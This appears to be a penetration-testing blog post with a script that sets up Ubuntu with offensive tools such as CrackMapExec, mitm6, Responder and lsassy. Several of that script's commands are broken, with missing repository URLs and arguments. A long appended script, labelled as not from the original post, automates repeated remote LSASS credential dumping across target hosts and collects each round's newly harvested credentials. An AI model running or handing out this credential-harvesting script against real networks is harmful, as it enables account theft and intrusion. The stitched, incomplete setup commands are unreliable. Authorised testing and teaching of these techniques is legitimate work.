
7 Minute Security

Sep 16, 2020

Yay! It's time for another tale of pentest pwnage! Highlights include:

  • Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.

  • Why lsassy is my new best friend.

  • I gave a try to using an Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

    #!/bin/bash

    # Base packages
    sudo apt-get update
    sudo apt-get upgrade -y
    sudo apt-get install openssh-server -y
    sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y

    # Aha helps take output from and make it nice and HTML-y
    sudo git clone /opt/aha

    # Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need!
    sudo git clone /opt/awesome-nmap-grep

    # bpatty is...well...bpatty!
    sudo git clone /opt/bpatty

    # CrackMapExec is...awesome (binary release, unzipped into /opt/cme)
    sudo mkdir -p /opt/cme
    cd /opt/cme
    sudo curl -L -o
    sudo unzip
    sudo chmod +x ./cme

    # eyewitness is a nice recon tool for putting some great visualization behind nmap scans
    sudo git clone /opt/eyewitness
    cd /opt/eyewitness/Python/setup
    sudo ./

    # impacket is "a collection of Python classes for working with network protocols"
    # I currently primarily use it for
    sudo git clone /opt/impacket
    cd /opt/impacket
    sudo pip3 install .

    # mitm6 is a way to tinker with IPv6 and get around some IPv4-level protections
    sudo git clone /opt/mitm6
    cd /opt/mitm6
    sudo pip3 install -r requirements.txt

    # service-identity is a dependency mitm6 needs at run time
    sudo pip3 install service-identity

    # lsassy dumps and parses LSASS remotely
    sudo python3 -m pip install lsassy

    # nmap-bootstrap-xsl turns nmap scan output into pretty HTML
    sudo git clone /opt/nmap-bootstrap-xsl

    # netcreds "Sniffs sensitive data from interface or pcap"
    sudo git clone /opt/netcreds

    # PCredz parses pcaps for sensitive data
    sudo git clone /opt/pcredz

    # PowerSploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment"
    sudo git clone /opt/powersploit

    # PowerUpSQL is a tool for discovering, enumerating and potentially pwning SQL servers!
    sudo git clone /opt/powerupsql

    # Responder is awesome for LLMNR, NBT-NS and mDNS poisoning
    sudo git clone /opt/responder
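Tying the first two highlights together (taking several rounds of dumps, and leaning on lsassy for them), here is an added example, not a script from the original post or from the CrackMapExec/lsassy projects, of how to script the "multiple rounds" idea: run CrackMapExec's lsassy module against the same target list several times, a few minutes apart, and print only the credentials that no earlier round produced. The `cme smb ... -M lsassy` flags, the `/opt/cme/cme` path (where the setup script above puts the binary), the `LSASSY` prefix on module output lines, and the user/password/domain arguments are all assumptions; check them against `cme smb --help` and one real run before trusting the filtering.

```shell
#!/bin/sh
# Multi-round LSASS harvesting via CrackMapExec's lsassy module.
# Added example, not from the original post. The cme flags, the /opt/cme/cme
# path and the LSASSY output prefix are assumptions to verify against
# `cme smb --help` and a real run.
set -eu

CME=${CME:-/opt/cme/cme}   # CME binary as laid down by the setup script above
OUT=${OUT:-rounds}         # raw per-round output lands here as round-N.txt

# One round: run the lsassy module against every target and keep the raw output.
dump_round() {
    local n=$1 targets=$2 user=$3 pass=$4 domain=$5
    mkdir -p "$OUT"
    "$CME" smb "$targets" -u "$user" -p "$pass" -d "$domain" -M lsassy \
        > "$OUT/round-$n.txt"
}

# Credential records from one round: module output lines (CME prefixes them with
# the module name, assumed here to be LSASSY), with runs of blanks collapsed so
# the same host/user/hash line compares equal from one round to the next.
records() {
    grep -E '^[[:blank:]]*LSASSY' "$1" 2>/dev/null \
        | sed -E 's/[[:blank:]]+/ /g; s/^ //; s/ $//' \
        | sort -u
}

# Records in round N that no earlier round produced. Logons come and go, so a
# second or third dump of the same hosts regularly surfaces creds the first missed.
new_in_round() {
    local n=$1 prev cur i
    prev=$(mktemp); cur=$(mktemp)
    i=1
    while [ "$i" -lt "$n" ]; do
        records "$OUT/round-$i.txt"
        i=$((i + 1))
    done | sort -u > "$prev"
    records "$OUT/round-$n.txt" > "$cur"
    comm -13 "$prev" "$cur"
    rm -f "$prev" "$cur"
}

# Take ROUNDS dumps, INTERVAL seconds apart, printing only what is new each time.
run_rounds() {
    local rounds=$1 interval=$2 targets=$3 user=$4 pass=$5 domain=$6 n
    n=1
    while [ "$n" -le "$rounds" ]; do
        dump_round "$n" "$targets" "$user" "$pass" "$domain"
        echo "== round $n: credentials not seen in earlier rounds =="
        new_in_round "$n"
        if [ "$n" -lt "$rounds" ]; then sleep "$interval"; fi
        n=$((n + 1))
    done
}

# Usage: sh rounds.sh 3 600 targets.txt pentester 'Passw0rd!' CORP
if [ "$#" -ge 6 ]; then
    run_rounds "$@"
fi
```

Keep the `round-N.txt` files: the raw module output is your evidence for the report, and `new_in_round` lets you see at a glance whether the extra rounds were worth the noise they made on the wire.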